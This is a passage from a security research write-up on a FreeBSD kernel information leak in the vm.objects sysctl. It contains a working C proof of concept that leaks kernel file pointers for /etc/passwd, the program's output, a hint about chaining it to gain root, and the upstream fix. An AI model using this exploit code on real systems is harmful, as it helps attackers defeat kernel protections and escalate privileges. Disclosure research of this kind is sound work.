    close(s[1]);
    pin_to_cpu(0);

    /* set up the cmsg first */
    bzero(cmsgbuf, sizeof(cmsgbuf));
    cmsgh = (struct cmsghdr *)cmsgbuf;
    cmsgh->cmsg_level = SOL_SOCKET;
    cmsgh->cmsg_type = SCM_RIGHTS;
    cmsgh->cmsg_len = CMSG_LEN(sizeof(int) * NFDS);

    for (pfd = (int *)CMSG_DATA(cmsgh), n = 0; n < NFDS; ++n) {
        *pfd++ = fd;
    }

    /* now the msghdr */
    bzero(&msgh, sizeof(msgh));
    msgh.msg_iov = &iov;
    msgh.msg_iovlen = 1;
    msgh.msg_control = cmsgh;
    msgh.msg_controllen = cmsgh->cmsg_len;

    /* send and await ack */
    if (-1 == sendmsg(s[0], &msgh, 0))
        err(1, "sendmsg");

    if (-1 == recv(s[0], &ack, 1, 0))
        err(1, "recv");

    /* now we can leak the buffer */
    bzero(&buf, sizeof(buf));
    sysctlbyname("vm.objects", &buf, &bufsz, NULL, 0);

    /* and reap the child */
    waitpid(child, NULL, 0);

    return *(const void **)(&buf._kvo_qspare[3]);
}

int
main(int argc, char *argv[])
{
    int fd[2];

    /* open some interesting files to leak: */
    if (-1 == (fd[0] = open("/etc/passwd", O_RDONLY)))
        err(1, "open");

    if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
        err(1, "open");

    fprintf(stderr, "[+] /etc/passwd file ptr: %p\n", leak_kptr(fd[0]));
    fprintf(stderr, "[+] /etc/libmap.conf file ptr: %p\n", leak_kptr(fd[1]));

    /* close and re-open to show LIFO behaviour: */
    fputs("[+] close + reopen\n", stderr);

    close(fd[1]);
    if (-1 == (fd[1] = open("/etc/libmap.conf", O_RDONLY)))
        err(1, "open");

    fprintf(stderr, "[+] /etc/libmap.conf file ptr (again): %p\n", leak_kptr(fd[1]));
    return 0;
}

The output of running it:

$ cc -o vm_objects vm_objects.c && ./vm_objects
[+] /etc/passwd file ptr: 0xfffffd00009db6e0
[+] /etc/libmap.conf file ptr: 0xfffffd00009db410
[+] close + reopen
[+] /etc/libmap.conf file ptr (again): 0xfffffd00009db410

Success. Now we can chain that arbitrary write vulnerability to grant us write-access to /etc/passwd, add an empty-password root user and elevate.

What do you mean you don't have an arbitrary write vulnerability...?

Fix

The fix for this bug is super simple: the malloc in vm_object_list_handler just needs to include the M_ZERO flag. This ensures that the memory is zero-initialised and nothing useful will leak back to userland:

--- a/sys/vm/vm_object.c
+++ b/sys/vm/vm_object.c
@@ -2523,7 +2523,7 @@ vm_object_list_handler(struct sysctl_req *req, bool swap_only)
                    count * 11 / 10));
        }

-       kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK);
+       kvo = malloc(sizeof(*kvo), M_TEMP, M_WAITOK | M_ZERO);
        error = 0;

        /*

Conclusion

FreeBSD tends to do a decent job of preventing information disclosure bugs these days, but it really depends on the developer remembering to do the right thing at the right time; it's quite error-prone.

We were lucky in this case that the leaky allocation came from the general-purpose heap allocator. For many other types of object that originate from a dedicated zone, it's generally not possible to control the leak as easily as we did here.

Even so, these bugs can be fun to play with and don't require a huge amount of effort to make into useful parts of a chain. It's worth finding them.

For context on the effort put into this research: it took around an hour of walking through a bunch of sysctls to find this, and writing a PoC took maybe 30 minutes altogether.

PoC Archive

Download here.